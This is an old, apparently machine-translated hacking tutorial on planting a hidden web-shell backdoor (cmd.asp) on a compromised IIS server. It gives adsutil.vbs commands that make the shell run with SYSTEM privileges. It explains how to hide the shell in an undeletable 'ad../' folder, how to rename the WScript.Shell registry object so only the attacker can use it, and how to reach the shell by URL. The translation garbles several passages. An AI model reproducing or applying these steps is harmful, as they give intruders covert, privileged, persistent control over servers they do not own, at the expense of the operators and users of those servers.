Use adsutil. vbs +.../+ cmd. asp to create a perfect backdoor (alpha)

Author: Alpha Source: Unknown Nature of the article: original Times: 25 Release date: 2004-12-27

For a long time, we have been depressed about making a good backdoor. Those ready-made backdoor software can hardly escape the pursuit of anti-virus software, and it seems unrealistic to write a backdoor for these bugs. Next I will teach you a way to create your own backdoors! Required tools: One cmd. asp is enough. You can write one by yourself or find one by yourself. However, it is recommended that you write one by yourself! What's more, what you write will not be killed. There is a detailed note on CMD. asp written by myself on the CD. You can check it out! Creation process: Assume that you have attacked a machine. Now, start work! I believe everyone remembers that in the original article, setting the application program protection in IIS to: low (IIS process) and then running the ASP trojan has the system permission! We will set it to: (shared), and then let our cmd. asp run with the system permission. (Figure 1) This uses the adsutil. vbs tool. Adsutil. vbs is a built-in tool used to manage IIS, usually in C:/inetpub/adminscripts. The specific use of adsutil. vbs is not described here. Please check it online! Where When the application protection is set to "medium": lm/w3svc/inprocessisapiapps, start ISAPI in the process. Lm/w3svc/inprocessisapiapps is an array containing a group of ISAPI paths. The local systempermission of the listener and the isapiis started by the dllhost.exe process of svchost.exestarted. The running identity is iwam_name. However, we need to manually add ASP. dll here. Note that the content cannot be added and can only be overwritten !! Run: cscript adsutil. vbs get/w3svc/inprocessisapiapps Look at the original ones: (figure 2) Then run: cscript adsutil. vbs set/w3svc/inprocessisapiapps "C:/Windows/system32/inetsrv/httpext. DLL "" C:/Windows/system32/inetsrv/httpodbc. DLL "" C:/Windows/system32/inetsrv/ssinc. DLL "" C:/Windows/system32/msw3prt. DLL "" C:/Windows/Microsoft. net/framework/v1.1.4322/aspnet_isapi.dll "" C:/Windows/system32/inetsrv/asp. DLL" Note that each value is left with a space instead of a carriage return! For example (figure 3) Now, the application protection settings are useless. We still have the system permission! Then let's create a antivirus software that cannot be killed. The administrator can put cmd. asp in a folder that cannot be found! (Figure 4) Open the folder and you will find AAA and AAA magically. (When creating a folder, the AAA./folder contains 1.txt (figure 5) Where did 2.txt go? In fact, we open AAA. The folder is actually in the AAA folder. And 2.txt is still in the real aaa! This folder cannot be deleted in general! For details, refer to one of my articles: Make aspmu not killed. txt Let's take advantage of this principle. We create a folder in the directory of the zombie website. Suppose it is the folder named ad, and we create an ad .. /, and then run the Copy command to put our cmd. copy it to ASP! Now, we have a system backdoor that is not easily detected and is not found! I have never thought about it. If someone else uploads a cmd. asp file, we will not be the one in the back. No, we have to create a backdoor that only belongs to me! Cmd. asp has the following sentence: Set oscript = server. Createobject ("wscript. Shell ") This sentence is the core. Go to the Registry to search for the wscript. Shell item and change it to what you want, such as wscript. shellshell. (Figure 6) Note that wscript. shell.1 should also be changed during the search, or it will be too busy! Then Set oscript = server. Createobject ("wscript. Shell ") Change Set oscript = server. Createobject ("wscript. shellshell ") Okay. Copy cmd. asp to ad ../ In this way, you have your own backdoors. When accessing the backdoor, you only need to enter http: // host/AD ../CMD. asp You can. Let's take a look at this, (Figure 7) Oh, it's good! Note: The above is in 2003, and may be a little different in 2000, but I tested it in 2000, and it succeeded! If the error is correct, go to www.cnhack.cn to discuss it with me! Thanks to the nsfocus tombkeeper. ----- There are several points in this article that are clearly described for readers and editors. Replaced ".".